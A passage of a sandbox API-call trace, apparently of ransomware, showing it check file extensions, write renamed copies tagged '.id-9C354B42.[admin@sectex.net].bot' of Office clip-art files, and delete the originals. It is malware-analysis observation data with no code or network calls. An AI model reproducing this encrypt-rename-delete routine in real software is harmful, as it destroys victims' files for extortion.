	[0169.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString=".zip") returned 4
	[0169.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.711] lstrlenW (lpString=".rar") returned 4
	[0169.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString=".bz2") returned 4
	[0169.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString=".7z") returned 3
	[0169.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString=".dbf") returned 4
	[0169.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString=".1cd") returned 4
	[0169.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString=".jpg") returned 4
	[0169.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.711] lstrlenW (lpString=".doc") returned 4
	[0169.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.712] lstrlenW (lpString=".docx") returned 5
	[0169.712] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.712] lstrlenW (lpString=".pdf") returned 4
	[0169.712] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.712] lstrlenW (lpString=".xls") returned 4
	[0169.712] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.712] lstrlenW (lpString=".xlsx") returned 5
	[0169.712] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.712] lstrlenW (lpString=".ppt") returned 4
	[0169.712] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.712] lstrlenW (lpString=".zip") returned 4
	[0169.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.712] lstrlenW (lpString=".rar") returned 4
	[0169.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.712] lstrlenW (lpString=".bz2") returned 4
	[0169.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.712] lstrlenW (lpString=".7z") returned 3
	[0169.712] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.712] lstrlenW (lpString=".dbf") returned 4
	[0169.713] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.713] lstrlenW (lpString=".1cd") returned 4
	[0169.713] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.713] lstrlenW (lpString=".jpg") returned 4
	[0169.713] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.713] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.713] lstrlenW (lpString="J0171685.WMF") returned 12
	[0169.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.717] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14472) returned 1
	[0169.717] CloseHandle (hObject=0x124) returned 1
	[0169.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf")) returned 0x20
	[0169.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.717] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.717] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.718] GetLastError () returned 0x0
	[0169.718] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3888, lpOverlapped=0x0) returned 1
	[0169.720] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3890, lpOverlapped=0x0) returned 1
	[0169.721] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.721] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.721] SetEndOfFile (hFile=0x118) returned 1
	[0169.721] CloseHandle (hObject=0x118) returned 1
	[0169.721] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.721] SetEndOfFile (hFile=0x124) returned 1
	[0169.723] CloseHandle (hObject=0x124) returned 1
	[0169.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.724] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf")) returned 1
	[0169.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.724] lstrlenW (lpString=".doc") returned 4
	[0169.724] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.724] lstrlenW (lpString=".docx") returned 5
	[0169.725] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.725] lstrlenW (lpString=".pdf") returned 4
	[0169.725] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString=".xls") returned 4
	[0169.725] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.725] lstrlenW (lpString=".xlsx") returned 5
	[0169.725] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.725] lstrlenW (lpString=".ppt") returned 4
	[0169.725] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString=".zip") returned 4
	[0169.725] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.725] lstrlenW (lpString=".rar") returned 4
	[0169.725] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString=".bz2") returned 4
	[0169.725] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString=".7z") returned 3
	[0169.725] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString=".dbf") returned 4
	[0169.725] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString=".1cd") returned 4
	[0169.725] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString=".jpg") returned 4
	[0169.725] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.725] lstrlenW (lpString=".doc") returned 4
	[0169.725] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.725] lstrlenW (lpString=".docx") returned 5
	[0169.725] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.726] lstrlenW (lpString=".pdf") returned 4
	[0169.726] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString=".xls") returned 4
	[0169.726] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.726] lstrlenW (lpString=".xlsx") returned 5
	[0169.726] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.726] lstrlenW (lpString=".ppt") returned 4
	[0169.726] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.726] lstrlenW (lpString=".zip") returned 4
	[0169.726] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.726] lstrlenW (lpString=".rar") returned 4
	[0169.726] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString=".bz2") returned 4
	[0169.726] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString=".7z") returned 3
	[0169.726] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.726] lstrlenW (lpString=".dbf") returned 4
	[0169.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.726] lstrlenW (lpString=".1cd") returned 4
	[0169.726] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 63
	[0169.726] lstrlenW (lpString=".jpg") returned 4
	[0169.726] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.726] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.726] lstrlenW (lpString="J0171847.WMF") returned 12
	[0169.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.727] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6888) returned 1
	[0169.727] CloseHandle (hObject=0x124) returned 1
	[0169.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf")) returned 0x20
	[0169.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.727] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.728] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.729] GetLastError () returned 0x0
	[0169.729] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1ae8, lpOverlapped=0x0) returned 1
	[0169.744] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1af0, lpOverlapped=0x0) returned 1
	[0169.745] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.745] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.745] SetEndOfFile (hFile=0x118) returned 1
	[0169.745] CloseHandle (hObject=0x118) returned 1
	[0169.745] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.745] SetEndOfFile (hFile=0x124) returned 1
	[0169.747] CloseHandle (hObject=0x124) returned 1
	[0169.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf")) returned 1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString=".doc") returned 4
	[0169.756] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString=".docx") returned 5
	[0169.756] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.756] lstrlenW (lpString=".pdf") returned 4
	[0169.756] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString=".xls") returned 4
	[0169.756] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.756] lstrlenW (lpString=".xlsx") returned 5
	[0169.756] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.756] lstrlenW (lpString=".ppt") returned 4
	[0169.756] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString=".zip") returned 4
	[0169.756] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.756] lstrlenW (lpString=".rar") returned 4
	[0169.756] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString=".bz2") returned 4
	[0169.756] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString=".7z") returned 3
	[0169.756] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString=".dbf") returned 4
	[0169.756] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString=".1cd") returned 4
	[0169.756] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.756] lstrlenW (lpString=".jpg") returned 4
	[0169.756] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString=".doc") returned 4
	[0169.757] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString=".docx") returned 5
	[0169.757] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.757] lstrlenW (lpString=".pdf") returned 4
	[0169.757] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString=".xls") returned 4
	[0169.757] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.757] lstrlenW (lpString=".xlsx") returned 5
	[0169.757] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.757] lstrlenW (lpString=".ppt") returned 4
	[0169.757] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString=".zip") returned 4
	[0169.757] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.757] lstrlenW (lpString=".rar") returned 4
	[0169.757] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString=".bz2") returned 4
	[0169.757] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString=".7z") returned 3
	[0169.757] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString=".dbf") returned 4
	[0169.757] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString=".1cd") returned 4
	[0169.757] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 63
	[0169.757] lstrlenW (lpString=".jpg") returned 4
	[0169.757] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.758] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.758] lstrlenW (lpString="J0172193.WMF") returned 12
	[0169.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.509] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=12696) returned 1
	[0170.509] CloseHandle (hObject=0x350) returned 1
	[0170.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf")) returned 0x20
	[0170.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.509] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.509] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.510] GetLastError () returned 0x0
	[0170.510] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3198, lpOverlapped=0x0) returned 1
	[0170.512] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x31a0, lpOverlapped=0x0) returned 1
	[0170.513] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.513] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.513] SetEndOfFile (hFile=0x180) returned 1
	[0170.513] CloseHandle (hObject=0x180) returned 1
	[0170.513] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.513] SetEndOfFile (hFile=0x350) returned 1
	[0170.515] CloseHandle (hObject=0x350) returned 1
	[0170.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf")) returned 1
	[0170.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".doc") returned 4
	[0170.517] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString=".docx") returned 5
	[0170.517] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0170.517] lstrlenW (lpString=".pdf") returned 4
	[0170.517] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString=".xls") returned 4
	[0170.517] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.517] lstrlenW (lpString=".xlsx") returned 5
	[0170.517] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0170.517] lstrlenW (lpString=".ppt") returned 4
	[0170.517] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".zip") returned 4
	[0170.517] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.517] lstrlenW (lpString=".rar") returned 4
	[0170.517] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString=".bz2") returned 4
	[0170.517] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString=".7z") returned 3
